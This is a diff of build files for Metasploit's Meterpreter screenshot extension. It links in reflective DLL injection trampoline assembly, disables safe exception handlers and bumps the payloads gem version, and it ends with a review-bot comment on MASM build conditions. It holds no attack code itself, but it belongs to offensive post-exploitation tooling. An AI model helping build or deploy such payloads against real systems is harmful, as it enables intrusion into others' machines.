--- a/c/meterpreter/workspace/screenshot/CMakeLists.txt
+++ b/c/meterpreter/workspace/screenshot/CMakeLists.txt
@@ -25,7 +25,7 @@ set_target_properties(${PROJECT_NAME} PROPERTIES LINK_FLAGS "/DEF:\"${MOD_DEF_DI
 set_source_files_properties(${MOD_DEF_DIR}/plugin.def PROPERTIES HEADER_FILE_ONLY TRUE)
 set(LINK_LIBS jpeg)
-target_link_libraries(${PROJECT_NAME} ${LINK_LIBS})
+target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM})
 if(MSVC)
 target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070")
 endif()
diff --git a/c/meterpreter/workspace/screenshot/screenshot.vcxproj b/c/meterpreter/workspace/screenshot/screenshot.vcxproj
index b6f2b02e1..3186ca82a 100644
--- a/c/meterpreter/workspace/screenshot/screenshot.vcxproj
+++ b/c/meterpreter/workspace/screenshot/screenshot.vcxproj
@@ -149,6 +149,7 @@
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\plugin.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
@@ -196,6 +197,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile>
 </ProgramDatabaseFile>
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
@@ -242,6 +244,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName)
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\plugin.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
@@ -290,6 +293,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\plugin.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
@@ -340,6 +344,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile>
 </ProgramDatabaseFile>
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
@@ -388,6 +393,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName)
 <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\plugin.def</ModuleDefinitionFile>
 <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions>
 <ProgramDatabaseFile />
+ <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers>
 </Link>
 <PostBuildEvent>
 <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
@@ -403,6 +409,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <ClInclude Include="..\..\source\screenshot\bmp2jpeg.h" />
 <ClInclude Include="..\..\source\screenshot\screenshot.h" />
 </ItemGroup>
+ <ItemGroup>
+ <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm">
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
+ </MASM>
+ <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm">
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild>
+ <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
+ </MASM>
+ </ItemGroup>
 <Choose>
 <When Condition="'$(Platform)'=='Win32'" />
 </Choose>
@@ -410,4 +428,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
 <ImportGroup Label="ExtensionTargets">
 <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
 </ImportGroup>
-</Project>
+</Project>
\ No newline at end of file
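Review bot: The six ExcludedFromBuild entries in the new MASM item group (hunk at 403) each enumerate one Configuration|Platform pair, so a configuration added later, or one of the three names being renamed, silently assembles the wrong-bitness trampoline for that build. One platform-keyed condition per item states the intent and survives new configurations: `<ExcludedFromBuild Condition="'$(Platform)'=='x64'">true</ExcludedFromBuild>` on GateTrampoline32.asm and `<ExcludedFromBuild Condition="'$(Platform)'=='Win32'">true</ExcludedFromBuild>` on GateTrampoline64.asm. The existing `<When Condition="'$(Platform)'=='Win32'" />` block in the same hunk shows the project already keys on $(Platform) alone.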
diff --git a/gem/lib/metasploit-payloads/version.rb b/gem/lib/metasploit-payloads/version.rb index ee31ed2ba..88e1011d4 100644 --- a/gem/lib/metasploit-payloads/version.rb +++ b/gem/lib/metasploit-payloads/version.rb @@ -1,6 +1,6 @@ # -*- coding:binary -*- module MetasploitPayloads - VERSION = '2.0.163' + VERSION = '2.0.166' def self.version VERSION
